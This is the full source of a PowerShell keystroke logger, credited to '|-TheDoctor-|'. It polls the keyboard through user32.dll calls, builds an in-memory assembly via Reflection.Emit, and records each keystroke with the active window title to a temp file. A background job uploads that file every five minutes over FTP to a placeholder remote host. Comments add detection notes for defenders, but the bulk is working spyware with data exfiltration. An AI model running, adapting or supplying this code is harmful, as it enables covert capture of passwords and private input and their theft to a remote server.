- <#
- PowerShell keystroke logger
- Pasted together by
- |-TheDoctor-|
- #>
- function KeyLog {
- # Purpose: polls the keyboard through user32.dll P/Invoke calls and appends one
- # record per translated keystroke (foreground window title, character, timestamp)
- # to "$env:temp\key.log". The polling loop below is `while ($true)` with no exit path.
- # Detection note: with PowerShell script block logging enabled (event ID 4104) the
- # DllImport signatures for GetAsyncKeyState / GetKeyboardState / ToUnicode appear in
- # the logged script text; that combination is a strong indicator of keystroke capture.
- #
- # Map-type constants for MapVirtualKey. Of these, only $MAPVK_VSC_TO_VK_EX is
- # referenced again in this function.
- # MapVirtualKeyMapTypes
- # <summary>
- # uCode is a virtual-key code and is translated into a scan code.
- # If it is a virtual-key code that does not distinguish between left- and
- # right-hand keys, the left-hand scan code is returned.
- # If there is no translation, the function returns 0.
- # </summary>
- $MAPVK_VK_TO_VSC = 0x00
- # <summary>
- # uCode is a scan code and is translated into a virtual-key code that
- # does not distinguish between left- and right-hand keys. If there is no
- # translation, the function returns 0.
- # </summary>
- $MAPVK_VSC_TO_VK = 0x01
- # <summary>
- # uCode is a virtual-key code and is translated into an unshifted
- # character value in the low-order word of the return value. Dead keys (diacritics)
- # are indicated by setting the top bit of the return value. If there is no
- # translation, the function returns 0.
- # </summary>
- $MAPVK_VK_TO_CHAR = 0x02
- # <summary>
- # Windows NT/2000/XP: uCode is a scan code and is translated into a
- # virtual-key code that distinguishes between left- and right-hand keys. If
- # there is no translation, the function returns 0.
- # </summary>
- $MAPVK_VSC_TO_VK_EX = 0x03
- # <summary>
- # Not currently documented
- # </summary>
- $MAPVK_VK_TO_VSC_EX = 0x04
- # C# P/Invoke signatures for four user32.dll exports, held as here-strings and
- # compiled at runtime by the Add-Type calls below.
- $virtualkc_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- '@
- $kbstate_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- '@
- $mapchar_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- '@
- $tounicode_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
- '@
- # Each Add-Type call wraps one signature in a class under the Win32Functions
- # namespace; -passThru returns the type so the static method can be called as
- # $var::Method(...).
- $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
- $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
- $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
- $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
- # Second import path: reuse an already loaded [User32] type if one resolves;
- # otherwise the catch block builds one with Reflection.Emit. In this function
- # $ImportDll is only used for GetForegroundWindow.
- try
- {
- $ImportDll = [User32]
- }
- catch
- {
- # AssemblyBuilderAccess::Run creates a run-only dynamic assembly ('Win32Lib'),
- # i.e. one that is executed from memory and not saved to disk.
- # Detection note: Reflection.Emit combined with DllImportAttribute inside a
- # script is a pattern worth alerting on in script block logs.
- $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
- $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
- $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')
- $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
- # DllImportAttribute fields set on every method below; each $FieldValueArray
- # supplies its values in this same order.
- $FieldArray = [Reflection.FieldInfo[]] @(
- [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
- [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
- [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
- [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
- [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
- [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
- )
- # user32!GetAsyncKeyState
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
- $FieldValueArray = [Object[]] @(
- 'GetAsyncKeyState',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- # user32!GetKeyboardState
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
- $FieldValueArray = [Object[]] @(
- 'GetKeyboardState',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- # user32!MapVirtualKey
- $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
- $FieldValueArray = [Object[]] @(
- 'MapVirtualKey',
- $False,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- # user32!ToUnicode
- $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
- [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
- $FieldValueArray = [Object[]] @(
- 'ToUnicode',
- $False,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- # user32!GetForegroundWindow
- $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
- $FieldValueArray = [Object[]] @(
- 'GetForegroundWindow',
- $True,
- $False,
- $True,
- [Runtime.InteropServices.CallingConvention]::Winapi,
- [Runtime.InteropServices.CharSet]::Auto
- )
- $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
- $PInvokeMethod.SetCustomAttribute($CustomAttribute)
- $ImportDll = $TypeBuilder.CreateType()
- }
- # Polling loop: every 40 ms, query GetAsyncKeyState for virtual-key codes 1..254.
- # Detection note: a PowerShell process calling GetAsyncKeyState at this rate across
- # the whole key range is behaviour that EDR products can flag.
- while ($true) {
- Start-Sleep -Milliseconds 40
- $gotit = ""
- for ($char = 1; $char -le 254; $char++) {
- $vkey = $char
- $gotit = $getKeyState::GetAsyncKeyState($vkey)
- # -32767 is 0x8001 as a signed 16-bit value. Per the Win32 documentation the
- # top bit means the key is down and the low bit means it was pressed since
- # the previous GetAsyncKeyState call.
- if ($gotit -eq -32767) {
- # Re-query selected non-printing keys by virtual-key code
- # (13, 9, 46, 8, 37-40) so they can be labelled in the record.
- $EnterKey = $getKeyState::GetAsyncKeyState(13)
- $TabKey = $getKeyState::GetAsyncKeyState(9)
- $DeleteKey = $getKeyState::GetAsyncKeyState(46)
- $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
- $LeftArrow = $getKeyState::GetAsyncKeyState(37)
- $UpArrow = $getKeyState::GetAsyncKeyState(38)
- $RightArrow = $getKeyState::GetAsyncKeyState(39)
- $DownArrow = $getKeyState::GetAsyncKeyState(40)
- # Read here; not referenced again in this function.
- $caps_lock = [console]::CapsLock
- # MapVirtualKey is called with the virtual-key code and map type 0x03.
- $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
- # GetKeyboardState fills the 256-byte array that ToUnicode consumes below.
- $kbstate = New-Object Byte[] 256
- $checkkbstate = $getKBState::GetKeyboardState($kbstate)
- # Look up the foreground window title by matching its handle against
- # Get-Process output; every record is prefixed with that title, so the
- # log ties typed text to the application it was typed into.
- $TopWindow = $ImportDll::GetForegroundWindow()
- $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
- $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
- # ToUnicode writes the translated character(s) into the StringBuilder and
- # returns a count that gates the file write further down.
- $mychar = New-Object -TypeName "System.Text.StringBuilder";
- $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
- $LogOutput += $mychar.ToString();
- if ($EnterKey) {$LogOutput += '[ENTER]'}
- if ($TabKey) {$LogOutput += '[Tab]'}
- if ($DeleteKey) {$LogOutput += '[Delete]'}
- if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
- if ($LeftArrow) {$LogOutput += '[Left Arrow]'}
- if ($RightArrow) {$LogOutput += '[Right Arrow]'}
- if ($UpArrow) {$LogOutput += '[Up Arrow]'}
- if ($DownArrow) {$LogOutput += '[Down Arrow]'}
- $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
- $LogOutput += "`t`t`t`t`t" + $TimeStamp
- # A record is written only when ToUnicode returned a positive count.
- # Host artefact for responders: "key.log" in the user's temp directory,
- # appended to by a PowerShell process.
- if ($unicode_res -gt 0) {
- $logfile = "$env:temp\key.log"
- $LogOutput | Out-File -FilePath $logfile -Append
- }
- }
- }
- }
- }
- Start-Job {
- # Upload job: Start-Job runs this script block as a background job, so it runs
- # alongside the KeyLog call at the end of the file. Every $SleepTime seconds it
- # uploads "$env:temp\key.log" to $RemoteFile with System.Net.FtpWebRequest.
- # Detection note: EnableSsl is not set on the request, so the login and the file
- # contents are sent as plain FTP; recurring outbound FTP from a PowerShell process
- # is visible to network monitoring and can be blocked by egress filtering.
- # Config
- # The credentials and host below are template placeholders as pasted.
- $Username = "YourUsername"
- $Password = "YourPassword"
- $LocalFile = "$env:temp\key.log"
- $RemoteFile = "ftp://example.net/Log.txt"
- $SleepTime = 300
- while (1 -eq 1)
- {
- # Sleep for specified time
- Start-Sleep -Seconds $SleepTime
- # Create FTP Request Object
- $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
- $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
- $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
- $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
- $FTPRequest.UseBinary = $true
- $FTPRequest.UsePassive = $true
- # Read the File for Upload
- # gc is the Get-Content alias and -en abbreviates -Encoding: the whole log file
- # is read as a byte array.
- $FileContent = gc -en byte $LocalFile
- $FTPRequest.ContentLength = $FileContent.Length
- # Get Stream Request by bytes
- $Run = $FTPRequest.GetRequestStream()
- $Run.Write($FileContent, 0, $FileContent.Length)
- # Cleanup
- $Run.Close()
- $Run.Dispose()
- }
- }
- # Starts the capture loop in the current session; KeyLog's loop has no exit path,
- # so this call does not return.
- KeyLog